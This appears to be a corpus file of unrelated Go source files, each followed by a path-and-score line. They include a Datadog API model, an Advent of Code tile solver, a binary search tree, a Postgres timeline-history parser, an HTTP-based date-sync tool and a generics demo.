err = json.Unmarshal(bytes, &all)
if err != nil {
err = json.Unmarshal(bytes, &raw)
if err != nil {
return err
}
o.UnparsedObject = raw
return nil
}
o.IndexNames = all.IndexNames
return nil
}
type NullableLogsIndexesOrder struct {
value *LogsIndexesOrder
isSet bool
}
func (v NullableLogsIndexesOrder) Get() *LogsIndexesOrder {
return v.value
}
func (v *NullableLogsIndexesOrder) Set(val *LogsIndexesOrder) {
v.value = val
v.isSet = true
}
func (v NullableLogsIndexesOrder) IsSet() bool {
return v.isSet
}
func (v *NullableLogsIndexesOrder) Unset() {
v.value = nil
v.isSet = false
}
func NewNullableLogsIndexesOrder(val *LogsIndexesOrder) *NullableLogsIndexesOrder {
return &NullableLogsIndexesOrder{value: val, isSet: true}
}
func (v NullableLogsIndexesOrder) MarshalJSON() ([]byte, error) {
return json.Marshal(v.value)
}
func (v *NullableLogsIndexesOrder) UnmarshalJSON(src []byte) error {
v.isSet = true
return json.Unmarshal(src, &v.value)
} | api/v1/datadog/model_logs_indexes_order.go | 0.615435 | 0.435781 | model_logs_indexes_order.go | starcoder |
package tile
import (
"fmt"
"io"
"log"
"strconv"
"strings"
"github.com/cshabsin/advent/common/readinp"
)
// Map is the structure of a set of tiles.
type Map struct {
tiles map[int]*Tile
edgeMap map[int][]int
}
// Rotate rotates the given tile n times counterclockwise.
func (tm *Map) Rotate(tileNum, rotate int) {
tm.tiles[tileNum].Rotate(rotate)
}
// GetTile returns the numbered tile.
func (tm Map) GetTile(tileNum int) *Tile {
return tm.tiles[tileNum]
}
// ReadFile reads an input file and produces a tile Map.
func ReadFile(filename string) (*Map, error) {
ch, err := readinp.Read(filename)
if err != nil {
return nil, err
}
tiles := &Map{tiles: map[int]*Tile{}, edgeMap: map[int][]int{}}
for {
nextTile, err := Read(ch)
if err == io.EOF {
break
}
if err != nil {
return nil, err
}
tid := nextTile.ID()
tiles.tiles[tid] = nextTile
if err == io.EOF {
break
} else if err != nil {
return nil, err
}
for i := 0; i < 4; i++ {
edge := nextTile.ReadEdge(i)
tiles.edgeMap[edge] = append(tiles.edgeMap[edge], tid)
tiles.edgeMap[EdgeDual(edge)] = append(tiles.edgeMap[EdgeDual(edge)], tid)
}
_, err = ReadLine(ch) // skip blank line
if err != nil {
return nil, err
}
}
for _, tile := range tiles.tiles {
for i := 0; i < 4; i++ {
tile.SetNeighborFromEdgeMap(tiles.edgeMap)
}
}
return tiles, nil
}
// Tile is a tile from day 20 of advent of code 2020.
type Tile struct {
id int
allVals [][]bool
rotation int
flipped bool
neighbors []int // same indeces as edges, 0 for none
numNeighbors int
}
// Read reads a tile from the given readinp channel and returns it.
func Read(ch chan readinp.Line) (*Tile, error) {
var lines []string
for i := 0; i < 11; i++ {
line, err := ReadLine(ch)
if err != nil {
return nil, err
}
lines = append(lines, line)
}
return ParseLines(lines)
}
// ParseLines parses a number of lines to produce a single tile.
func ParseLines(lines []string) (*Tile, error) {
tid, err := strconv.Atoi(strings.TrimSuffix(strings.TrimPrefix(lines[0], "Tile "), ":"))
if err != nil {
return nil, err
}
allVals := make([][]bool, 10)
for i := 0; i < 10; i++ {
if err != nil {
log.Fatal(err)
}
allValLine := make([]bool, 10)
for j, c := range lines[i+1] {
allValLine[j] = c == '#'
}
allVals[i] = allValLine
}
return &Tile{
id: tid,
allVals: allVals,
}, nil
}
// ID returns the ID of the tile.
func (t Tile) ID() int {
return t.id
}
// ReadEdge reads the binary value of the bits on the given edge.
// edges are: 0(top), 1(left), 2(bottom), 3(right)
func (t Tile) ReadEdge(e int) int {
switch e {
case 0: // top
total := 0
for j := 0; j < 10; j++ {
total *= 2
if t.getRaw(0, j) {
total++
}
}
return total
case 1: // left
total := 0
for j := 0; j < 10; j++ {
total *= 2
if t.getRaw(j, 0) {
total++
}
}
return total
case 2: // bottom
total := 0
for j := 0; j < 10; j++ {
total *= 2
if t.getRaw(9, j) {
total++
}
}
return total
case 3: // right
total := 0
for j := 0; j < 10; j++ {
total *= 2
if t.getRaw(j, 9) {
total++
}
}
return total
default:
log.Fatal("bad e", e)
return -1
}
}
func (t Tile) getRaw(y, x int) bool {
switch t.rotation % 4 {
case 1:
x, y = 9-y, x
case 2:
x, y = 9-x, 9-y
case 3:
x, y = y, 9-x
}
if t.flipped {
x = 9 - x
}
return t.allVals[y][x]
}
// Get tells whether the given pixel is set, based on the contents of the tile and its rotation state.
func (t Tile) Get(y, x int) bool {
return t.getRaw(y+1, x+1)
}
// Rotate rotates the tile counterclockwise n times.
func (t *Tile) Rotate(n int) {
t.rotation = (t.rotation + n) % 4
}
// Flip flips the tile across y axis.
func (t *Tile) Flip() {
t.flipped = !t.flipped
}
// EdgeMatches determines whether the edge matches the given value.
func (t Tile) EdgeMatches(e, val int) bool {
if t.ReadEdge(e) == val {
return true
}
return false
}
// MatchEdge flips and rotates the tile until the given value is on the given edge.
func (t *Tile) MatchEdge(e, val int) {
for j := 0; j < 2; j++ {
for i := 0; i < 4; i++ {
if t.ReadEdge(e) == val {
return
}
t.Rotate(1)
}
t.Flip()
}
log.Fatalf("no match for %d on edge %d in tile:\n%v", val, e, *t)
}
// SetNeighborFromEdgeMap sets the neighbors from a collected map of edge value to matching tiles.
func (t *Tile) SetNeighborFromEdgeMap(edgeMap map[int][]int) {
neighborCount := 0
t.neighbors = make([]int, 4)
for i := 0; i < 4; i++ {
edge := t.ReadEdge(i)
edgeMatches := edgeMap[edge]
if len(edgeMatches) == 1 {
continue // no neighbor in that direction
}
for _, neighbor := range edgeMatches {
if neighbor != t.id {
neighborCount++
t.neighbors[i] = neighbor
break
}
}
}
t.numNeighbors = neighborCount
}
// NumNeighbors returns the number of matched neighbors.
func (t Tile) NumNeighbors() int {
return t.numNeighbors
}
// GetNeighbor returns the neighbor number on the given edge, after rotation/flip (0 if none)
func (t Tile) GetNeighbor(e int) int {
if t.neighbors == nil {
return -1
}
e = (e - t.rotation + 4) % 4
if t.flipped {
if e == 1 {
e = 3
} else if e == 3 {
e = 1
}
}
return t.neighbors[e]
}
// HasNeighbor returns whether there is a
func (t Tile) HasNeighbor(e int) bool {
return t.GetNeighbor(e) != 0
}
func (t Tile) String() string {
leftEdge := strconv.Itoa(t.ReadEdge(1))
leftDual := fmt.Sprintf("(%d)", EdgeDual(t.ReadEdge(1)))
spacer := " " + strconv.Itoa(t.rotation)
for len(leftEdge) < len(leftDual) {
leftEdge += " "
}
for range leftDual {
spacer += " "
}
var b strings.Builder
b.WriteString(fmt.Sprintf("%d%s%d (%d) ^ %d\n", t.id, spacer, t.ReadEdge(0), EdgeDual(t.ReadEdge(0)), t.GetNeighbor(0)))
for y := 0; y < 8; y++ {
if y == 3 {
b.WriteString(leftEdge + " ")
} else if y == 4 {
b.WriteString(leftDual + " ")
} else {
b.WriteString(spacer)
}
for x := 0; x < 8; x++ {
if t.Get(y, x) {
b.WriteString("X ")
} else {
b.WriteString(". ")
}
}
if y == 3 {
b.WriteString(" " + strconv.Itoa(t.ReadEdge(3)))
} else if y == 4 {
b.WriteString(fmt.Sprintf(" (%d)", EdgeDual(t.ReadEdge(3))))
}
b.WriteString("\n")
}
b.WriteString(fmt.Sprintf("<- %d %d (%d) v %d -> %d\n", t.GetNeighbor(1), t.ReadEdge(2), EdgeDual(t.ReadEdge(2)), t.GetNeighbor(2), t.GetNeighbor(3)))
return b.String()
}
// EdgeDual returns the "dual" of a given edge value (i.e. its value with bits read in the other direction).
func EdgeDual(a int) int {
var b int
for i := 0; i < 10; i++ {
b = b*2 + (a >> i & 1)
}
return b
}
// ReadLine reads a single line from the given channel and trims it.
// Returns EOF error on eof, or any other errors.
func ReadLine(ch chan readinp.Line) (string, error) {
line, ok := <-ch
if !ok {
return "", io.EOF
}
if line.Error != nil {
return "", line.Error
}
return strings.TrimSpace(*line.Contents), nil
} | 2020/tile/tile.go | 0.708313 | 0.438966 | tile.go | starcoder |
package rbt
// BinaryTree is a binary search tree keyed by Comparable keys.
// An empty tree has a nil Root.
type BinaryTree struct {
	Root *BinaryTreeNode // nil when the tree is empty
}
// NewBinaryTree creates an empty binary search tree.
func NewBinaryTree() *BinaryTree {
	t := new(BinaryTree)
	return t
}
// Insert adds a node with the given key and value to the tree, returning
// false (and inserting nothing) when a node with an equal key already exists.
// NOTE(review): descent direction is inverted relative to a textbook BST —
// CMP_LESS walks right and CMP_MORE walks left, consistently with Find;
// confirm CmpResult semantics before "fixing" either.
func (t *BinaryTree) Insert(key Comparable, v interface{}) (ret bool) {
	ret = true
	node := NewBinaryTreeNode(key, v)
	cur := t.Root
	if cur == nil {
		// Empty tree: the new node becomes the root.
		t.Root = node
		return
	}
	var parent *BinaryTreeNode // tracks the parent of cur during the descent
	var cmpResult CmpResult    // result of the most recent comparison
	for cur != nil {
		parent = cur
		cmpResult = key.Cmp(cur.Key)
		switch cmpResult {
		case CMP_EQ:
			return false
		case CMP_LESS:
			cur = cur.Right
		case CMP_MORE:
			cur = cur.Left
		}
	}
	// Attach on whichever side the final comparison walked off of.
	if cmpResult == CMP_MORE {
		parent.SetLeftChild(node)
	} else {
		parent.SetRightChild(node)
	}
	return
}
// learn from https://www.bilibili.com/video/BV17P4y1h74 0:54:22
// Remove deletes the node whose key compares equal to v, returning false
// when no such node exists. Deletion is split into three cases by how many
// children the found node has.
func (t *BinaryTree) Remove(v Comparable) (ret bool) {
	ret = true
	cur := t.Find(v)
	if cur == nil {
		return false
	}
	// case 1: both children are nil — simply unlink cur from its parent
	// (or clear the root when cur has no parent).
	if cur.Left == nil && cur.Right == nil {
		isRoot := cur.Parent == nil
		if isRoot {
			t.Root = nil
		} else {
			parent := cur.Parent
			// cur is the left child of parent
			if cur == parent.Left {
				parent.Left = nil
			} else {
				parent.Right = nil
			}
		}
		cur.Clear()
		return
	}
	// case 2: exactly one child is non-nil — delegate to the copy-based variant.
	if (cur.Left == nil && cur.Right != nil) || (cur.Left != nil && cur.Right == nil) {
		t.RemoveCaseTwo_b(cur)
		return
	}
	// case 3: both children present.
	t.RemoveCaseThree(cur)
	return
}
// RemoveCaseTwo_a handles deletion of a node with exactly one child by
// splicing that child directly into the deleted node's position. It has to
// distinguish whether cur is the root, a left child, or a right child.
// (Variant _b below achieves the same by copying instead of re-linking.)
func (t *BinaryTree) RemoveCaseTwo_a(cur *BinaryTreeNode) {
	// Pick the single non-nil child.
	child := cur.Left
	if cur.Right != nil {
		child = cur.Right
	}
	if cur.Parent == nil {
		// cur is the root: the child becomes the new root.
		t.Root = child
		child.Parent = nil
	} else {
		parent := cur.Parent
		child.Parent = parent
		if parent.Left == cur {
			parent.Left = child
		} else {
			parent.Right = child
		}
	}
	cur.Clear()
}
// RemoveCaseTwo_b handles deletion of a node with exactly one child by
// copying the child's key/value into cur, adopting the child's subtrees,
// and then discarding the now-redundant child node. Unlike RemoveCaseTwo_a
// it never has to touch cur's parent.
func (t *BinaryTree) RemoveCaseTwo_b(cur *BinaryTreeNode) {
	// Pick the single non-nil child.
	var candidateNode *BinaryTreeNode
	if cur.Left != nil {
		candidateNode = cur.Left
	}
	if cur.Right != nil {
		candidateNode = cur.Right
	}
	cur.CloneValue(candidateNode)
	cur.SetLeftChild(candidateNode.Left)
	cur.SetRightChild(candidateNode.Right)
	// BUG FIX: clear the spliced-out child, not cur. Clearing cur would wipe
	// the key/value/links just copied into it; the original comment ("只需要
	// 删除 candidateNode") and the analogous right.Clear()/leftMost.Clear()
	// cleanup in RemoveCaseThree both show candidateNode is the node to drop.
	candidateNode.Clear()
}
// RemoveCaseThree handles deletion of a node with two children.
// Let right := cur.Right. Two sub-cases:
// 3.1 If right.Left is nil, copy right's key/value into cur, make
//     right.Right cur's right child, and discard right.
// 3.2 Otherwise find the leftmost node of right's subtree (leftMost, the
//     in-order successor), copy its key/value into cur, attach
//     leftMost.Right as the left child of leftMost's parent, and discard
//     leftMost.
func (t *BinaryTree) RemoveCaseThree(cur *BinaryTreeNode) {
	right := cur.Right
	// case: 3.1
	if right.Left == nil {
		cur.CloneValue(right)
		cur.SetRightChild(right.Right)
		right.Clear()
		return
	}
	// case:3.2
	leftMost := t.FindMostLeft(right)
	cur.CloneValue(leftMost)
	parent := leftMost.Parent
	parent.SetLeftChild(leftMost.Right)
	leftMost.Clear()
}
// Find returns the node whose key compares equal to v, or nil when no such
// node exists. The descent direction mirrors Insert: CMP_LESS walks right
// and CMP_MORE walks left.
func (t *BinaryTree) Find(v Comparable) *BinaryTreeNode {
	node := t.Root
	for node != nil {
		switch v.Cmp(node.Key) {
		case CMP_EQ:
			return node
		case CMP_LESS:
			node = node.Right
		case CMP_MORE:
			node = node.Left
		}
	}
	return nil
}
// FindMostLeft returns the leftmost node of the subtree rooted at cur,
// i.e. its minimum node.
func (t *BinaryTree) FindMostLeft(cur *BinaryTreeNode) *BinaryTreeNode {
	node := cur
	for node.Left != nil {
		node = node.Left
	}
	return node
}
// 查找节点 cur 右子树中最右边的节点,也就是最大节点
func (t *BinaryTree) FindMostRight(cur *BinaryTreeNode) *BinaryTreeNode {
for cur.Right != nil {
cur = cur.Right
}
return cur
} | binary_tree.go | 0.569134 | 0.458227 | binary_tree.go | starcoder |
package internal
/*
This module can represent a Timeline History file which can be retrieved from Postgres using the TIMELINEHISTORY SQL command.
A Timeline History file belongs to a timeline (which also will be the last Row in the file), and contains multiple rows.
Each row describes at what LSN that timeline came to be.
Example history file:
1 0/2A33FF50 no recovery target specified
2 0/2A3400E8 no recovery target specified
By storing the Timeline History file in this object, it can easilly be searched for the timeline that a specific LSN belongs too.
Furthermore it can be read as an IOReader (having a Name() and Read() function) to easilly writeout by the WalUploader.
*/
import (
"io"
"regexp"
"sort"
"strconv"
"strings"
"github.com/jackc/pglogrepl"
)
// The TimeLineHistFileRow struct represents one line in the TimeLineHistory file.
type TimeLineHistFileRow struct {
	TimeLineID uint32        // timeline this row describes
	StartLSN   pglogrepl.LSN // LSN at which that timeline came to be
	Comment    string        // optional trailing comment column
}
// The TimeLineHistFile struct represents a TimeLineHistory file containing TimeLineHistFileRows.
// Since TimeLineHistFileRows are only parsed 0 or 1 times, the data is only
// preserved as []byte and parsed to TimeLineHistFileRows when required.
type TimeLineHistFile struct {
	TimeLineID uint32 // timeline the history file itself belongs to
	Filename   string // name exposed via Name() for the uploader
	data       []byte // raw file contents, parsed lazily by rows()
	readIndex  int    // read cursor for the io.Reader implementation
}
// NewTimeLineHistFile is a helper function to define a new TimeLineHistFile.
// The error return is reserved for future validation and is currently always nil.
func NewTimeLineHistFile(timelineid uint32, filename string, body []byte) (TimeLineHistFile, error) {
	return TimeLineHistFile{
		TimeLineID: timelineid,
		Filename:   filename,
		data:       body,
	}, nil
}
// tlhColumns matches runs of non-whitespace characters and is used to split a
// history-file row into its (up to three) columns. It is compiled once at
// package init instead of on every rows() call, as the original did.
var tlhColumns = regexp.MustCompile(`\S+`)

// rows parses the data ([]byte) of a TimeLineHistFile and returns the
// TimeLineHistFileRows it contains. Everything after a '#' on a line is a
// comment and ignored; a valid row has at least a timeline id and a start
// LSN, and an optional third column kept verbatim as the row comment.
// Parsing stops at the first malformed id or LSN, returning the rows read so
// far together with the parse error.
func (tlh TimeLineHistFile) rows() ([]TimeLineHistFileRow, error) {
	var rows []TimeLineHistFileRow
	for _, row := range strings.Split(string(tlh.data), "\n") {
		// Strip the trailing comment, then take at most 3 columns.
		cols := tlhColumns.FindAllString(strings.SplitN(row, "#", 2)[0], 3)
		if len(cols) < 2 {
			continue // blank or comment-only line
		}
		tlid, err := strconv.Atoi(cols[0])
		if err != nil {
			return rows, err
		}
		tlhr := TimeLineHistFileRow{TimeLineID: uint32(tlid)}
		tlhr.StartLSN, err = pglogrepl.ParseLSN(cols[1])
		if err != nil {
			return rows, err
		}
		if len(cols) > 2 {
			tlhr.Comment = cols[2]
		}
		rows = append(rows, tlhr)
	}
	return rows, nil
}
// LSNToTimeLine uses rows() to get all TimeLineHistFileRows and from those
// rows determines the timeline that an LSN belongs to.
func (tlh TimeLineHistFile) LSNToTimeLine(lsn pglogrepl.LSN) (uint32, error) {
	rows, err := tlh.rows()
	if err != nil {
		return 0, err
	}
	// Sorting makes LSNToTimeLine more efficient
	sort.Slice(rows, func(i, j int) bool {
		return rows[i].TimeLineID < rows[j].TimeLineID
	})
	// Return the lowest-numbered timeline whose switch LSN lies beyond lsn.
	for _, row := range rows {
		if lsn < row.StartLSN {
			return row.TimeLineID, nil
		}
	}
	// Past every recorded switch point: the LSN belongs to the history
	// file's own (latest) timeline.
	return tlh.TimeLineID, nil
}
// Name returns the filename of this wal segment. This is a convenience
// function used by the WalUploader; it simply exposes the Filename field.
func (tlh TimeLineHistFile) Name() string {
	return tlh.Filename
}
// Read is what makes the WalSegment an io.Reader, which can be handled by
// WalUploader.UploadWalFile. It copies from data starting at readIndex and
// reports io.EOF once the buffer is exhausted.
// NOTE(review): the receiver is a value, so the readIndex advance is lost
// between calls whenever the reader is held behind an io.Reader interface —
// a multi-call read would re-deliver the same prefix forever. A pointer
// receiver would fix this, but changes the type's method set; confirm how
// callers pass this value before changing it.
func (tlh TimeLineHistFile) Read(p []byte) (n int, err error) {
	n = copy(p, tlh.data[tlh.readIndex:])
	tlh.readIndex += n
	if len(tlh.data) <= tlh.readIndex {
		return n, io.EOF
	}
	return n, nil
}
package main
import (
"fmt"
"log"
"net/http"
"os"
"os/exec"
"strings"
"time"
"github.com/leekchan/timeutil"
"gopkg.in/alecthomas/kingpin.v2"
)
var (
	// serversArg lists the HTTP(S) servers whose Date response header is used
	// for synchronization; repeatable, defaults to pool.ntp.org and ntp.org.
	serversArg = kingpin.Flag("server", "server to use for synchronization, multiple values possible").Short('s').Default("pool.ntp.org", "ntp.org").URLList()
	// debugFlag enables verbose logging when --debug/-d is passed.
	debugFlag = kingpin.Flag("debug", "turn debug on").Short('d').Default("false").Bool()
	// commandToSetDate is the optional user command used to set the date;
	// its arguments may contain the strftime-style directives listed below.
	commandToSetDate = kingpin.Arg("command", `command to set the date. You can use following directives to format the date:
%a Weekday as locale’s abbreviated name. (Sun, Mon, ..., Sat)
%A Weekday as locale’s full name. (Sunday, Monday, ..., Saturday)
%w Weekday as a decimal number, where 0 is Sunday and 6 is Saturday (0, 1, ..., 6)
%d Day of the month as a zero-padded decimal number. (01, 02, ..., 31)
%b Month as locale’s abbreviated name. (Jan, Feb, ..., Dec)
%B Month as locale’s full name. (January, February, ..., December)
%m Month as a zero-padded decimal number. (01, 02, ..., 12)
%y Year without century as a zero-padded decimal number. (00, 01, ..., 99)
%Y Year with century as a decimal number. (1970, 1988, 2001, 2013)
%H Hour (24-hour clock) as a zero-padded decimal number. (00, 01, ..., 23)
%I Hour (12-hour clock) as a zero-padded decimal number. (01, 02, ..., 12)
%p Meridian indicator. (AM, PM)
%M Minute as a zero-padded decimal number. (00, 01, ..., 59)
%S Second as a zero-padded decimal number. (00, 01, ..., 59)
%f Microsecond as a decimal number, zero-padded on the left. (000000, 000001, ..., 999999)
%z UTC offset in the form +HHMM or -HHMM (+0000)
%Z Time zone name (UTC)
%j Day of the year as a zero-padded decimal number (001, 002, ..., 366)
%U Week number of the year (Sunday as the first day of the week) as a zero padded decimal number. All days in a new year preceding the first Sunday are considered to be in week 0.
(00, 01, ..., 53)
%W Week number of the year (Monday as the first day of the week) as a decimal number. All days in a new year preceding the first Monday are considered to be in week 0.
(00, 01, ..., 53)
%c Date and time representation. (Tue Aug 16 21:30:00 1988)
%x Date representation. (08/16/88)
%X Time representation. (21:30:00)
%% A literal '%' character. (%)
Example:
htpdate --server pool.ntp.org --server ntp.org -- date --set="%a, %d %b %Y %H:%M:%S %Z"
If not specified htpdate tries to set the date by itself
`).Strings()
)
func main() {
kingpin.Version("1.0")
kingpin.Parse()
logDebug := func(s string, v ...interface{}) {
log.Printf(s, v...)
}
if !*debugFlag {
logDebug = func(s string, v ...interface{}) {}
}
if len(*serversArg) <= 0 {
fmt.Fprintf(os.Stderr, "No servers to synchronization\n")
os.Exit(1)
return
}
var dateToSet *time.Time
for _, s := range *serversArg {
if s.Scheme == "" {
s.Scheme = "http"
}
logDebug("Querying `%s'", s.String())
req, err := http.NewRequest(http.MethodHead, s.String(), nil)
if err != nil {
logDebug("Unable to create request for `%s': %v", s.String(), err)
continue
}
res, err := http.DefaultClient.Do(req)
if err != nil {
logDebug("Unable to do request to `%s': %v", s.String(), err)
continue
}
date := res.Header.Get("Date")
if date == "" {
logDebug("`%s' has no date", s.String())
continue
}
t, err := time.Parse(time.RFC1123, date)
if err != nil {
logDebug("`%s' has invalid date (`%s') was not RFC1123", s.String(), date)
continue
}
logDebug("`%s' reports `%s'", s.String(), t.String())
dateToSet = &t
break
}
if dateToSet == nil {
logDebug("No time to set")
fmt.Fprintf(os.Stderr, "No server responded a valid time\n")
os.Exit(1)
return
}
logDebug("Setting time to %s", (*dateToSet).String())
if len(*commandToSetDate) > 0 {
for i := range *commandToSetDate {
(*commandToSetDate)[i] = timeutil.Strftime(dateToSet, (*commandToSetDate)[i])
}
logDebug("Running %v %d", *commandToSetDate, len(*commandToSetDate))
var args []string
if len(*commandToSetDate) > 1 {
args = (*commandToSetDate)[1:]
}
cmd := exec.Command((*commandToSetDate)[0], args...)
cmd.Stdin = os.Stdin
cmd.Stderr = os.Stderr
cmd.Stdout = os.Stdout
if err := cmd.Run(); err != nil {
fmt.Fprintf(os.Stderr, "Error on running `%s': %v", strings.Join(*commandToSetDate, " "), err)
os.Exit(1)
return
}
os.Exit(1)
return
}
if err := setTime(*dateToSet); err != nil {
panic(err)
}
} | main.go | 0.501221 | 0.403126 | main.go | starcoder |
package main
import "fmt"
// Number constrains a type parameter to int64 or float64.
type Number interface {
	int64 | float64
}
// Custom is satisfied by any type that has a parameterless Method.
type Custom interface {
	Method()
}
// SomeType is a demo struct used to exercise the Custom interface below.
type SomeType struct {
	Field string
}
// Method prints the Field value; it makes SomeType satisfy Custom.
func (st SomeType) Method() {
	fmt.Println(st.Field)
}
// main demonstrates the non-generic, generic, and constraint-based sum
// helpers, plus generic functions and types over custom interfaces.
func main() {
	// Initialize a map for the integer values
	ints := map[string]int64{
		"first":  34,
		"second": 12,
	}
	// Initialize a map for the float values
	floats := map[string]float64{
		"first":  35.98,
		"second": 26.99,
	}
	fmt.Printf("Non-Generic Sums: %v and %v\n",
		SumInts(ints),
		SumFloats(floats))
	// Explicit instantiation of the type parameters.
	fmt.Printf("Generic Sums: %v and %v\n",
		SumIntsOrFloats[string, int64](ints),
		SumIntsOrFloats[string, float64](floats))
	// Same calls, letting the compiler infer the type parameters.
	fmt.Printf("Generic Sums, type parameters inferred: %v and %v\n",
		SumIntsOrFloats(ints),
		SumIntsOrFloats(floats))
	fmt.Printf("Generic Sums with Constraint: %v and %v\n",
		SumNumbers(ints),
		SumNumbers(floats))
	fmt.Println()
	st := SomeType{"this is a string"}
	CheckCustomGenerics(st)
	CheckCustomInterface(st)
	fmt.Println()
	fmt.Println(Invoke(int64(3), AsFloat))
	// cannot use generic type ContainsSomething[T comparable] without instantiation
	// fmt.Println(ContainsSomething{Something: "hello"})
	fmt.Println()
	fmt.Println(ContainsSomething[string]{Something: "hello"})
	fmt.Println(ContainsSomething[int64]{Something: 789})
}
// SumInts adds together the values of m.
func SumInts(m map[string]int64) (total int64) {
	for _, value := range m {
		total += value
	}
	return total
}
// SumFloats adds together the values of m.
func SumFloats(m map[string]float64) (total float64) {
	for _, value := range m {
		total += value
	}
	return total
}
// SumIntsOrFloats sums the values of map m. It supports both floats and
// integers as map values.
func SumIntsOrFloats[K comparable, V int64 | float64](m map[K]V) V {
	var total V
	for key := range m {
		total += m[key]
	}
	return total
}
// SumNumbers sums the values of map m. It supports both integers and floats
// as map values via the Number constraint.
func SumNumbers[K comparable, V Number](m map[K]V) V {
	var total V
	for key := range m {
		total += m[key]
	}
	return total
}
// Just checking if custom interface can be used in generics
// CheckCustomGenerics calls t.Method via a type parameter constrained by Custom.
func CheckCustomGenerics[T Custom](t T) {
	fmt.Println("Using generics")
	t.Method()
}
// CheckCustomInterface calls t.Method via a plain interface parameter, for
// comparison with the generic variant above.
func CheckCustomInterface(t Custom) {
	fmt.Println("Using interface")
	t.Method()
}
// Invoke prints a marker line, then applies f to t and returns the result.
// Both the argument and the result types must satisfy the Number constraint.
func Invoke[E Number, T Number](t T, f func(t T) E) E {
	fmt.Println("Invoke is called.")
	return f(t)
}
// AsFloat converts an int64 to float64; used as the callback for Invoke in main.
func AsFloat(i int64) float64 {
	return float64(i)
}
// ContainsSomething is a generic container holding a single value of any
// comparable type.
type ContainsSomething[T comparable] struct {
	Something T
}
package kparams
import (
"strconv"
)
const (
	// NA defines an absent parameter's value.
	NA = "na"
)
// Value defines the container for parameter values
type Value interface{}

// Type defines kernel event parameter type
type Type uint16

// Hex is the type alias for hexadecimal values
type Hex string

// NewHex creates a new Hex type from the given integer value. Unsigned
// integers are formatted via FormatUint, signed integers via FormatInt
// (negative values therefore render with a leading '-'). Non-integer values
// yield the empty Hex string, as before.
// Generalized over the original: int8/int16/int/uint are now handled
// (previously they silently mapped to ""); redundant self-conversions on the
// uint64/int64 branches were dropped.
func NewHex(v Value) Hex {
	switch n := v.(type) {
	case uint8:
		return Hex(strconv.FormatUint(uint64(n), 16))
	case uint16:
		return Hex(strconv.FormatUint(uint64(n), 16))
	case uint32:
		return Hex(strconv.FormatUint(uint64(n), 16))
	case uint64:
		return Hex(strconv.FormatUint(n, 16))
	case uint:
		return Hex(strconv.FormatUint(uint64(n), 16))
	case int8:
		return Hex(strconv.FormatInt(int64(n), 16))
	case int16:
		return Hex(strconv.FormatInt(int64(n), 16))
	case int32:
		return Hex(strconv.FormatInt(int64(n), 16))
	case int64:
		return Hex(strconv.FormatInt(n, 16))
	case int:
		return Hex(strconv.FormatInt(int64(n), 16))
	default:
		return ""
	}
}
// Uint8 yields an uint8 value from its hex representation.
func (hex Hex) Uint8() uint8 { return uint8(hex.parseUint(8)) }

// Uint16 yields an uint16 value from its hex representation.
func (hex Hex) Uint16() uint16 { return uint16(hex.parseUint(16)) }

// Uint32 yields an uint32 value from its hex representation.
func (hex Hex) Uint32() uint32 { return uint32(hex.parseUint(32)) }

// Uint64 yields an uint64 value from its hex representation.
func (hex Hex) Uint64() uint64 { return hex.parseUint(64) }

// parseUint parses the hex string with the given bit size, returning 0 on
// any parse error — callers therefore cannot distinguish a genuine zero
// from malformed input.
func (hex Hex) parseUint(bitSize int) uint64 {
	num, err := strconv.ParseUint(string(hex), 16, bitSize)
	if err != nil {
		return uint64(0)
	}
	return num
}

// String returns a string representation of the hex value.
func (hex Hex) String() string {
	return string(hex)
}
const (
	// Null is a null parameter type
	Null Type = iota
	// UnicodeString a string of 16-bit characters. By default, assumed to have been encoded using UTF-16LE
	UnicodeString
	// AnsiString a string of 8-bit characters
	AnsiString
	// Int8 a signed 8-bit integer
	Int8
	// Uint8 an unsigned 8-bit integer
	Uint8
	// Int16 a signed 16-bit integer
	Int16
	// Uint16 an unsigned 16-bit integer
	Uint16
	// Int32 a signed 32-bit integer
	Int32
	// Uint32 an unsigned 32-bit integer
	Uint32
	// Int64 a signed 64-bit integer
	Int64
	// Uint64 an unsigned 64-bit integer
	Uint64
	// Float an IEEE 4-byte floating-point number
	Float
	// Double an IEEE 8-byte floating-point number
	Double
	// Bool a 32-bit value where 0 is false and 1 is true
	Bool
	// Binary is binary data of variable size. The size must be specified in the data definition as a constant or a reference to another (integer) data item. For an IP V6 address, the data should be an IN6_ADDR structure.
	// For a socket address, the data should be a SOCKADDR_STORAGE structure. The AF_INET, AF_INET6, and AF_LINK address families are supported
	Binary
	// GUID is a GUID structure. On output, the GUID is rendered in the registry string form, {xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}
	GUID
	// Pointer an unsigned 32-bit or 64-bit pointer value. The size depends on the architecture of the computer logging the event
	Pointer
	// SID a security identifier (SID) structure that uniquely identifies a user or group
	SID
	// PID is the process identifier
	PID
	// TID is the thread identifier
	TID
	// WbemSID is the Web-Based Enterprise Management security identifier.
	WbemSID
	// HexInt8 is the hexadecimal representation of 8-bit integer
	HexInt8
	// HexInt16 is the hexadecimal representation of 16-bit integer
	HexInt16
	// HexInt32 is the hexadecimal representation of 32-bit integer
	HexInt32
	// HexInt64 is the hexadecimal representation of 64-bit integer
	HexInt64
	// Port represents the endpoint port number
	Port
	// IP is the IP address
	IP
	// IPv4 is the IPv4 address
	IPv4
	// IPv6 is the IPv6 address
	IPv6
	// Time represents the timestamp
	Time
	// Slice represents a collection of items
	Slice
	// Enum represents an enumeration
	Enum
	// Map represents a map
	Map
	// Object is the generic object
	Object
	// Unknown represents an unknown parameter type
	Unknown
)
// String returns the type string representation.
// NOTE(review): only the types listed below have names; Null, Float, Double,
// Bool, Binary, GUID, Pointer, IP, Time, Slice, Enum, Map and Object all
// fall through to "unknown" — confirm whether that is intentional before
// adding cases.
func (t Type) String() string {
	switch t {
	case UnicodeString:
		return "unicode"
	case AnsiString:
		return "ansi"
	case Int8:
		return "int8"
	case Uint8:
		return "uint8"
	case HexInt8:
		return "hex8"
	case Int16:
		return "int16"
	case Uint16:
		return "uint16"
	case HexInt16:
		return "hex16"
	case Int32:
		return "int32"
	case Uint32:
		return "uint32"
	case Int64:
		return "int64"
	case Uint64:
		return "uint64"
	case HexInt32:
		return "hex32"
	case HexInt64:
		return "hex64"
	// SID and WbemSID deliberately share one representation.
	case SID, WbemSID:
		return "sid"
	case TID:
		return "tid"
	case PID:
		return "pid"
	case Port:
		return "port"
	case IPv6:
		return "ipv6"
	case IPv4:
		return "ipv4"
	default:
		return "unknown"
	}
}
package cryptoapis
import (
"encoding/json"
)
// ListUnspentTransactionOutputsByAddressRI struct for ListUnspentTransactionOutputsByAddressRI.
